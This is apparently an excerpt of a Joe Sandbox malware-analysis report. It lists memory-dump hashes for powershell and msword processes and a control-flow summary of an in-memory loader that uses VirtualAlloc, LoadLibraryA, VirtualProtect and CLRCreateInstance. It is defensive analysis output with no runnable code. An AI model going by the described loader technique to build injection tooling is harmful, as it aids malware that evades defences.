                                                                                                        • Snapshot File: hcaresult_23_2_7ffd997e0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4ac487dee4bce97d1dd2226fe047be8ebc434a97240ec764eacf5a2dda27a9fc
                                                                                                        • Instruction ID: fbefcb3d21643953a459f8d37ee983de7c599e1061995cb55df82f07e666cfc3
                                                                                                        • Opcode Fuzzy Hash: 4ac487dee4bce97d1dd2226fe047be8ebc434a97240ec764eacf5a2dda27a9fc
                                                                                                        • Instruction Fuzzy Hash: A4F05E32B0C5448FDB68EE8CE4558A877E0EF4936875500F6E16DC74A7DA25EC50C752
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000017.00000002.2387549016.00007FFD997E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD997E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_23_2_7ffd997e0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                        • Instruction ID: ee61fe5c97863ca06c788a7291ce20ab79f0e1896b4f775b37ce1e30cf93f19a
                                                                                                        • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                        • Instruction Fuzzy Hash: D5E01A31B0C8089FDA78DE8CE0509A973E1EB9C36571101B7D14EC7571CA32EC518B82
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000017.00000002.2386293388.00007FFD99718000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99718000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_23_2_7ffd99718000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: M_^$M_^$M_^$M_^
                                                                                                        • API String ID: 0-1397233021
                                                                                                        • Opcode ID: 4410a67cf079aa02a1329f526029f2a1748ea8b853a5305f8bd41ac1075e4295
                                                                                                        • Instruction ID: d2926088e88c3678236a981c99c3d6b0061d64f2591e4a64ade3b96d0991d58f
                                                                                                        • Opcode Fuzzy Hash: 4410a67cf079aa02a1329f526029f2a1748ea8b853a5305f8bd41ac1075e4295
                                                                                                        • Instruction Fuzzy Hash: 584143A3B0E6D65FF3778A689C7A2D57F91EF52298B4D02F6C094CB0D3ED19140B8252
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000017.00000002.2386293388.00007FFD99718000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99718000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_23_2_7ffd99718000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: M_^4$M_^7$M_^F$M_^J
                                                                                                        • API String ID: 0-622050427
                                                                                                        • Opcode ID: 35da09152ee7229958dc4b18d9d9ddb6be2a5859f73624424fc14014d018acb6
                                                                                                        • Instruction ID: 8f653429e558024460b9d3103bb7cb3ce455cb6dfe4edcff3c5415946c342561
                                                                                                        • Opcode Fuzzy Hash: 35da09152ee7229958dc4b18d9d9ddb6be2a5859f73624424fc14014d018acb6
                                                                                                        • Instruction Fuzzy Hash: CE2129777084A68ED3027BBDF8149DA3740CF942747C503B2E1A8DB083FE1470868AC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000019.00000002.2636212280.00007FFD9960D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9960D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_25_2_7ffd9960d000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: HWP
                                                                                                        • API String ID: 0-2732872507
                                                                                                        • Opcode ID: 0e4dfa1d0432d0c8e6fee6a2c0f9ff5421cb97a6a61ecae8caf5beb393405d9b
                                                                                                        • Instruction ID: f6269630fa033d39ea258dbc33f66cf9a7841f24acf48390165a42ba85ff594d
                                                                                                        • Opcode Fuzzy Hash: 0e4dfa1d0432d0c8e6fee6a2c0f9ff5421cb97a6a61ecae8caf5beb393405d9b
                                                                                                        • Instruction Fuzzy Hash: B041147190EBC44FE7668B3998959623FB0EF63224B1505EFD089CB1A3D625A806C793
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000019.00000002.2637724139.00007FFD99720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99720000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_25_2_7ffd99720000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 35333a296bbce7a46714b403c00d31bc06721913cf20b5f4032eddfdc29c97a0
                                                                                                        • Instruction ID: 96afc374cd92bd8a93603d0d8758cb5af4610cba333acf4fe0431fee12c75ace
                                                                                                        • Opcode Fuzzy Hash: 35333a296bbce7a46714b403c00d31bc06721913cf20b5f4032eddfdc29c97a0
                                                                                                        • Instruction Fuzzy Hash: 4E412C3190DB884FDB18DF6C9C0A6B97FE0FB55315F04416FD49983292CA60B815CBC2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000019.00000002.2637724139.00007FFD99720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99720000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_25_2_7ffd99720000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 816f3658b348e5bf1a85f424a0473117cdd00faab8e3b17b360a7b2e965f6bd5
                                                                                                        • Instruction ID: 8906c855a59743f644b7029fb2f618b18588c68391e54368ddcd9acb3b1df530
                                                                                                        • Opcode Fuzzy Hash: 816f3658b348e5bf1a85f424a0473117cdd00faab8e3b17b360a7b2e965f6bd5
                                                                                                        • Instruction Fuzzy Hash: 99210C3190C74C4FEB59DFAC984A7E97FF0EB96321F04416BD048C3156DA74A85ACB92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000019.00000002.2637724139.00007FFD99720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99720000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_25_2_7ffd99720000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 17a44d0136ce20591ec399c2938830d7e028ab90d858659d808998a5b12dbc43
                                                                                                        • Instruction ID: faf89c644046506db5ae92bb5b7ccbf00118ef7a7bf0ea96a46fe1801422ba5e
                                                                                                        • Opcode Fuzzy Hash: 17a44d0136ce20591ec399c2938830d7e028ab90d858659d808998a5b12dbc43
                                                                                                        • Instruction Fuzzy Hash: D511EBB3B5AA9A4FD7768E589CA50EC3760EF61284B0910B7D09CC70E2EE1574168683
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000019.00000002.2639379132.00007FFD997F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD997F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_25_2_7ffd997f0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c176b1c7724a6365e53775d4505298ef2dd62e0e850022cb7c9ca0de982dc4ef
                                                                                                        • Instruction ID: ae6f581b6ecde4863c2e75dfc71fc3075cd73f664fddb918f42a632149a02697
                                                                                                        • Opcode Fuzzy Hash: c176b1c7724a6365e53775d4505298ef2dd62e0e850022cb7c9ca0de982dc4ef
                                                                                                        • Instruction Fuzzy Hash: 9D112322F0D68D8FEBA5DE9894A42A877D1EF58358F0840BEC44CD708BDD259C45C396
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000019.00000002.2637724139.00007FFD99720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99720000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_25_2_7ffd99720000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                        • Instruction ID: 702bb83cba67d1812291c3a853c532be8d696d0a7c84f0b342e993f88c4144da
                                                                                                        • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                        • Instruction Fuzzy Hash: AA01677121CB0D4FD748EF0CE451AA9B7E0FB95364F10056EE58AC36A5DA36E882CB46
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000019.00000002.2639379132.00007FFD997F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD997F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_25_2_7ffd997f0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2d42b9cf4f6e1d76f4199bf3286d05f6b03f5454549e178c72a829fe0671f162
                                                                                                        • Instruction ID: c3fb914107dd83135bc6b5909c6f097bb732a1c956e3872f921a14e48482efe2
                                                                                                        • Opcode Fuzzy Hash: 2d42b9cf4f6e1d76f4199bf3286d05f6b03f5454549e178c72a829fe0671f162
                                                                                                        • Instruction Fuzzy Hash: 4CF09A32B0C5058FD768EE4CE4548A873E0EF5832871100BAE16DC71ABCE29EC808782
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000019.00000002.2639379132.00007FFD997F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD997F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_25_2_7ffd997f0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e4413093e91b3af1a773d48670b54fe0bcb3b1cabbb9a16e849555b4676aa7e3
                                                                                                        • Instruction ID: c195e168c56e851c332a1984d0030a8e54826c89305c7ca53d004890b5f4af62
                                                                                                        • Opcode Fuzzy Hash: e4413093e91b3af1a773d48670b54fe0bcb3b1cabbb9a16e849555b4676aa7e3
                                                                                                        • Instruction Fuzzy Hash: 01F0BE32B0C5448FD768EF4CE4548B873E0EF0832874100B6E16DD70ABCA2AEC50C781
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000019.00000002.2639379132.00007FFD997F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD997F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_25_2_7ffd997f0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                        • Instruction ID: 56b18f3ecb28952a67dc1f9ba9c8b2a40ecafeb547acc8bb4f80888ce33f3a9c
                                                                                                        • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                        • Instruction Fuzzy Hash: 80E01A31B0C8089FDA78DE4DE0549A973E1FB9836571101B7D14ED7565CA22EC518BC1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000019.00000002.2637724139.00007FFD99720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99720000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_25_2_7ffd99720000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: L_^8$L_^<$L_^?$L_^J$L_^K$L_^N$L_^Q$L_^Y
                                                                                                        • API String ID: 0-1415242001
                                                                                                        • Opcode ID: 43fc97dd348e09cb18fe9713d6d3d241ea91d68ddf1fc4c99a3e80af88e2cd8f
                                                                                                        • Instruction ID: 4de216567a263cb24e9e0c83708b40921b2dd3f3dbc15a1e93d4be10e3f0e52a
                                                                                                        • Opcode Fuzzy Hash: 43fc97dd348e09cb18fe9713d6d3d241ea91d68ddf1fc4c99a3e80af88e2cd8f
                                                                                                        • Instruction Fuzzy Hash: 9F21F273B045564AC3023BADB8529EE7780DF9437838561F3E328DF153DF24A48B8A86
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:1.4%
                                                                                                        Dynamic/Decrypted Code Coverage:81%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:42
                                                                                                        Total number of Limit Nodes:1
                                                                                                        execution_graph 34646 d1d900 34647 d1d906 34646->34647 34647->34646 34649 d1d939 34647->34649 34650 d4a860 SetWaitableTimer 34647->34650 34651 d4a8df 34650->34651 34651->34649 34652 17fabc17634 VirtualAlloc 34653 17fabc17650 34652->34653 34661 17fabc17646 34652->34661 34654 17fabc1774a LoadLibraryA 34653->34654 34655 17fabc17783 34653->34655 34653->34661 34654->34653 34658 17fabc17883 34655->34658 34655->34661 34662 17fabc1ab64 LoadLibraryA 34655->34662 34658->34661 34682 17fabc17f4e 34658->34682 34663 17fabc1ab9d 34662->34663 34665 17fabc1785b 34662->34665 34664 17fabc1abf3 VirtualProtect 34663->34664 34663->34665 34664->34665 34666 17fabc1ac1f 34664->34666 34665->34661 34672 17fabc1ad6b LoadLibraryA 34665->34672 34667 17fabc1ac38 VirtualProtect 34666->34667 34668 17fabc1ac6a 34667->34668 34668->34665 34669 17fabc1aca4 VirtualProtect 34668->34669 34669->34665 34670 17fabc1accd 34669->34670 34671 17fabc1ace6 VirtualProtect 34670->34671 34671->34665 34673 17fabc1ada4 34672->34673 34680 17fabc1ad9a 34672->34680 34674 17fabc1adfa VirtualProtect 34673->34674 34673->34680 34675 17fabc1ae26 34674->34675 34674->34680 34676 17fabc1ae3f VirtualProtect 34675->34676 34677 17fabc1ae71 34676->34677 34678 17fabc1aeab VirtualProtect 34677->34678 34677->34680 34679 17fabc1aed4 34678->34679 34678->34680 34681 17fabc1aeed VirtualProtect 34679->34681 34680->34658 34681->34680 34683 17fabc17f7b 34682->34683 34684 17fabc17fae CLRCreateInstance 34683->34684 34685 17fabc17fe2 34683->34685 34684->34685 34686 17fabc180f4 34685->34686 34687 17fabc18133 SysAllocString 34685->34687 34686->34661 34688 17fabc18180 34687->34688 34688->34686 34689 17fabc182f5 SafeArrayDestroy 34688->34689 34689->34686 34690 d4a3c0 34691 d4a3e8 34690->34691 34692 d4a3f9 VirtualAlloc 34690->34692 34691->34692

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 162 d4a860-d4a8d6 SetWaitableTimer 163 d4a8df-d4a8e8 162->163
                                                                                                        APIs
                                                                                                        • SetWaitableTimer.KERNELBASE ref: 00D4A8C1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000001E.00000002.2866044839.0000000000CF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 00CF0000, based on PE: true
                                                                                                        • Associated: 0000001E.00000002.2865997575.0000000000CF0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                        • Associated: 0000001E.00000002.2866190026.0000000000D56000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                        • Associated: 0000001E.00000002.2866315495.0000000000DC9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                        • Associated: 0000001E.00000002.2866315495.0000000000E0F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                        • Associated: 0000001E.00000002.2866315495.0000000000E15000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                        • Associated: 0000001E.00000002.2866315495.0000000000E3D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                        • Associated: 0000001E.00000002.2866551133.0000000000E42000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                        • Associated: 0000001E.00000002.2866612721.0000000000E43000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_30_2_cf0000_msword.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: TimerWaitable
                                                                                                        • String ID:
                                                                                                        • API String ID: 1823812067-0
                                                                                                        • Opcode ID: b8d8bc20444b0f3ddb10f3260271c8a328cd586a06bbfc39b759788e7e84120b
                                                                                                        • Instruction ID: d51c2edec7d60726bf8dfdc0d36c37f7da3c9fd33d5f28807f192efb36218f9e
                                                                                                        • Opcode Fuzzy Hash: b8d8bc20444b0f3ddb10f3260271c8a328cd586a06bbfc39b759788e7e84120b
                                                                                                        • Instruction Fuzzy Hash: C301C476225F8485DB508B4AF8A035A7360F3C8FA4F541222EEAE977A4CF3DC121CB00
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000001E.00000002.2870615547.0000017FABC00000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017FABC00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_30_2_17fabc00000_msword.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: LibraryLoad
                                                                                                        • String ID:
                                                                                                        • API String ID: 1029625771-0
                                                                                                        • Opcode ID: 3384dbaf04124ae408191e174ba91d228b647bba7aee9aeb13463d67c128df74
                                                                                                        • Instruction ID: db4ebba7f8c543193d23cbc036bc39eba50964432e9119b8e1ab23e4ab1f56d2
                                                                                                        • Opcode Fuzzy Hash: 3384dbaf04124ae408191e174ba91d228b647bba7aee9aeb13463d67c128df74
                                                                                                        • Instruction Fuzzy Hash: 2A51D730B0894E8FDF80EB5CD884FAE73F5FBA8301F104965A42DE3295D634EA518B41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000001E.00000002.2870615547.0000017FABC00000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017FABC00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_30_2_17fabc00000_msword.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: LibraryLoad
                                                                                                        • String ID:
                                                                                                        • API String ID: 1029625771-0
                                                                                                        • Opcode ID: f3343c76b6cd9d232af124fb01760c8ff8c6bf56e7b46f00006a0382ca75c8d6
                                                                                                        • Instruction ID: 57a67aec60dad05c198e07da04c8b40dde71daf473ca388aecfbfb105ce4ba2f
                                                                                                        • Opcode Fuzzy Hash: f3343c76b6cd9d232af124fb01760c8ff8c6bf56e7b46f00006a0382ca75c8d6
                                                                                                        • Instruction Fuzzy Hash: 9351D930B1894E8FDF84EE5CD984FAE73F5FBA8310F104925A42DE3294D634E9518B41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000001E.00000002.2870615547.0000017FABC00000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017FABC00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_30_2_17fabc00000_msword.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocArrayCreateDestroyInstanceSafeString
                                                                                                        • String ID:
                                                                                                        • API String ID: 815377780-0
                                                                                                        • Opcode ID: d6c33fbdd27555ea15998292fd2b30ed37ee76d798fb2c96181b5ec01cfddad2
                                                                                                        • Instruction ID: 9c97bc405f7101b869905ad7c53259168ca2b5063fb15006c0c6aaaf3697c99b
                                                                                                        • Opcode Fuzzy Hash: d6c33fbdd27555ea15998292fd2b30ed37ee76d798fb2c96181b5ec01cfddad2
                                                                                                        • Instruction Fuzzy Hash: 42E16D74A08A0E9FDF84EF5CD884F9ABBF1FB68300F1485A5A41DD7255D674EA81CB80
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 82 17fabc17634-17fabc17644 VirtualAlloc 83 17fabc17650-17fabc176fa call 17fabc1af5f call 17fabc1af17 call 17fabc1b402 call 17fabc1b0e4 82->83 84 17fabc17646-17fabc1764b 82->84 94 17fabc17700-17fabc17735 call 17fabc1aa54 83->94 95 17fabc17958-17fabc17959 83->95 85 17fabc17a11-17fabc17a19 84->85 103 17fabc17741-17fabc17748 94->103 104 17fabc17737-17fabc1773c 94->104 96 17fabc17965-17fabc17972 95->96 98 17fabc17974-17fabc17982 96->98 99 17fabc179db-17fabc17a0c call 17fabc1af17 96->99 98->99 101 17fabc17984-17fabc179d1 call 17fabc1af17 98->101 99->85 101->99 105 17fabc17774-17fabc17781 103->105 104->85 108 17fabc17783-17fabc1778a 105->108 109 17fabc1774a-17fabc17770 LoadLibraryA 105->109 112 17fabc177e0-17fabc177ed 108->112 109->105 113 17fabc177ef-17fabc177fc 112->113 114 17fabc1778c-17fabc177d6 call 17fabc1aa54 112->114 117 17fabc17812-17fabc1781f 113->117 118 17fabc177fe-17fabc1780c call 17fabc17a1a 113->118 123 17fabc177dc 114->123 124 17fabc1795b-17fabc1795c 114->124 121 17fabc17831-17fabc1783d 117->121 122 17fabc17821-17fabc1782f 117->122 118->117 129 17fabc1795e-17fabc1795f 118->129 126 17fabc17840-17fabc1784d 121->126 122->126 123->112 124->96 127 17fabc1789f-17fabc178a8 126->127 128 17fabc1784f-17fabc17862 call 17fabc1ab64 126->128 131 17fabc178b5-17fabc178c1 call 17fabc18bb1 127->131 132 17fabc178aa-17fabc178b3 127->132 136 17fabc17864-17fabc17871 128->136 137 17fabc17877-17fabc1787e call 17fabc1ad6b 128->137 129->96 131->96 132->131 134 17fabc178c6-17fabc178cf 132->134 139 17fabc178d1-17fabc178da 134->139 140 17fabc178dc-17fabc178f1 call 17fabc17f4e 134->140 136->137 142 17fabc17961-17fabc17962 136->142 146 17fabc17883-17fabc1788a 137->146 139->140 144 17fabc1791b-17fabc17924 139->144 149 17fabc178f3-17fabc17901 call 17fabc18312 140->149 150 17fabc17906-17fabc17919 call 17fabc1898b 140->150 142->96 147 17fabc17931-17fabc1793d call 17fabc196ce 144->147 148 17fabc17926-17fabc1792f 144->148 146->127 151 17fabc1788c-17fabc17899 146->151 147->96 148->147 152 17fabc1793f-17fabc17948 148->152 149->150 150->96 151->127 156 17fabc17964 151->156 152->96 158 17fabc1794a-17fabc17956 call 17fabc194b6 152->158 156->96 158->96
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000001E.00000002.2870615547.0000017FABC00000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017FABC00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_30_2_17fabc00000_msword.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: 92c0ea50874150b054a817daf60ee9fc003736d41b50868d266c4d75121e88d1
                                                                                                        • Instruction ID: 02f5332e8b8f1f515f1481fd292a10dd62a88282b634a2f7a01645a2fee7476e
                                                                                                        • Opcode Fuzzy Hash: 92c0ea50874150b054a817daf60ee9fc003736d41b50868d266c4d75121e88d1
                                                                                                        • Instruction Fuzzy Hash: 52E1A270A1891D8FEF94EB9CD485FAEB7F1FB58300F504969E11DE7292D634E9828B40
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 164 d4a3c0-d4a3e6 165 d4a3e8-d4a3eb 164->165 166 d4a3f9-d4a43f VirtualAlloc 164->166 167 d4a3ed 165->167 168 d4a3ef-d4a3f6 165->168 167->168 168->166
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000001E.00000002.2866044839.0000000000CF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 00CF0000, based on PE: true
                                                                                                        • Associated: 0000001E.00000002.2865997575.0000000000CF0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                        • Associated: 0000001E.00000002.2866190026.0000000000D56000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                        • Associated: 0000001E.00000002.2866315495.0000000000DC9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                        • Associated: 0000001E.00000002.2866315495.0000000000E0F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                        • Associated: 0000001E.00000002.2866315495.0000000000E15000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                        • Associated: 0000001E.00000002.2866315495.0000000000E3D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                        • Associated: 0000001E.00000002.2866551133.0000000000E42000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                        • Associated: 0000001E.00000002.2866612721.0000000000E43000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_30_2_cf0000_msword.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: f9e25bd1500fc878524e57a4b8c9ba2e86e3843b3906fc13af291d7eff15cb2c
                                                                                                        • Instruction ID: db11834d87324fae8c9e6ddae56dce7a99cb084abcaf0ade4a0c0e8a548eec3e
                                                                                                        • Opcode Fuzzy Hash: f9e25bd1500fc878524e57a4b8c9ba2e86e3843b3906fc13af291d7eff15cb2c
                                                                                                        • Instruction Fuzzy Hash: A2F03776A11B8082DB25CF5EE9813297370F74CBE8F244216DE5DA7B24DB39E592C340
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%